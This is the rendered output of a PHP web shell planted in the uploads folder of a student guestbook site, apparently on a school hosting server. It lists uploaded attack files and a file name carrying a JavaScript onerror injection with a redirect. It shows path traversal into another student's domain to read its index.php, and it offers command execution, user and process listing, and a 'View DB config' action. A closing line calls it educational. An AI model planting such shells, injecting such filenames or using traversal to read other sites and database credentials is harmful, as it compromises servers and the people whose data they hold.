🐚 WEB SHELL ACTIVATED

πŸ“ File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png
📄 0tk5j14v024b1.jpg
📄 300px-Cursed_Cat.jpg
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg
📄 Bill-Gates-Paul-Allen-2013.jpg
📄 CV Jasper Kramp.png
📄 Cat profile.png
📄 Fronalpstock_big.jpg
📄 Krik en las.jpg
📄 Krik.jpg
📄 Pino-dood-03.jpg
📄 Shellz.php
📄 Ted_Kaczynski_2_(cropped).jpg
📄 Tux.svg.png
📄 Z.png
📄 android.jpg
📄 apple.php
📄 cianancatfish.jpg
📄 downloads (1).jpeg
📄 downloads.jpeg
📄 epresso.jpg
📄 fake_photo.png
📄 hand.jpg
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg
📄 image.png
📄 images.jpeg
📄 info.php
📄 inject.php
📄 instant_redirect.jpg
📄 japper.jpg
📄 koekiemonster-3.jpg
📄 logo.png
📄 muis.jpg
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg
📄 picobellobv.jpeg
📄 redirect.php
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg
📄 sdfsa.png
📄 sneaky.svg
📄 taylor.webp
📄 test.html
📄 testpreg.php
📄 testpreg1.php
📄 testtest.php.JPG
📄 ultimate_attack.gif
📄 ultimate_attack.php
📄 ultimate_attack.svg
📄 wallpaper.jpg
📄 webshell.php

📄 Viewing: ./../../../../584683.klas4s23.mid-ica.nl/public_html/../public_html/Gastenboek/index.php

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="gastenboek.css">
    <link rel="icon" type="image/x-icon" href="images/cat.png">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Whisper&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.1/dist/css/bootstrap.min.css">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.7.1/jquery.min.js"></script>
    <script type="text/javascript" src="https://www.viralpatel.net/demo/jquery/jquery.shorten.1.0.js"></script>
    <title>Nancy's guestbook</title>
</head>

<body>
    <form action="extra/upload.php" method="post" enctype="multipart/form-data">
        <div class="formPlacement">
            <h1>Guestbook</h1>
            <h1 id="nancy">Nancy<img id="nameIcon" src="images/cat.png"></h1>
            <label>Name:</label>
                <input type="text" name="name" id="name" class="inputFields"
                placeholder="(Limit 30char)" maxlength="30" required>
            <label>E-mail:</label>
                <input type="text" name="email" id="email" class="inputFields"
                placeholder="(Limit 100char)" maxlength="100" required>
            <label>Image (optional)</label>
            <label id="chooseText">Choose an image </label>
            <label id="requirementText">
                (can
                only be a <span class="details">.png, .jpg, .jpeg</span> or <span class="details">.gif</span> )<br>
                Max file size <span class="details">10 MB</span></label>
            <input type="file" name="uploadedFile">
            <label>Comment:</label><textarea name="comment" id="comment" class="inputFields" rows="5" cols="40"
                placeholder="(Limit 255char)" maxlength="255" required></textarea>
            <p id="error"></p>
            <button name="uploadButton" id="submit">Submit</button>
        </div>
        <div class="commentsPlacement">
            <div id="comments">
                <?php
                require_once "extra/display.php";
                ?>
            </div>
        </div>
    </form>
    <script>
        // Front-end restrictions only: these checks run in the browser and can be bypassed,
        // so the server-side handler (extra/upload.php) must validate the fields independently.
        document.getElementById("name").addEventListener("blur", function (event) {
            myFunction(event)
        });
        document.getElementById("email").addEventListener("blur", function (event) {
            myFunction(event)
        });
        document.getElementById("comment").addEventListener("blur", function (event) {
            myFunction(event)
        });

        function myFunction(event) {
            if (event.target.value == "") {
                event.target.style.borderColor = "red";
                document.getElementById("error").style.display = "block";
                document.getElementById("error").innerHTML = "Please fill all the fields in.";
            } else {
                event.target.style.borderColor = "#ded2b4";
                document.getElementById("error").innerHTML = "";
                document.getElementById("error").style.display = "none";
            }
        }

        //show more/less jquery plugin
        $(".commentContent").shorten({
            "showChars": 22,
            "moreText": "See More",
            "lessText": "Less",
        });
    </script>
</body>

</html>

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👀 Show user | 📁 Show directory | 🔄 Show processes | 🔍 Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | 🔍 View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!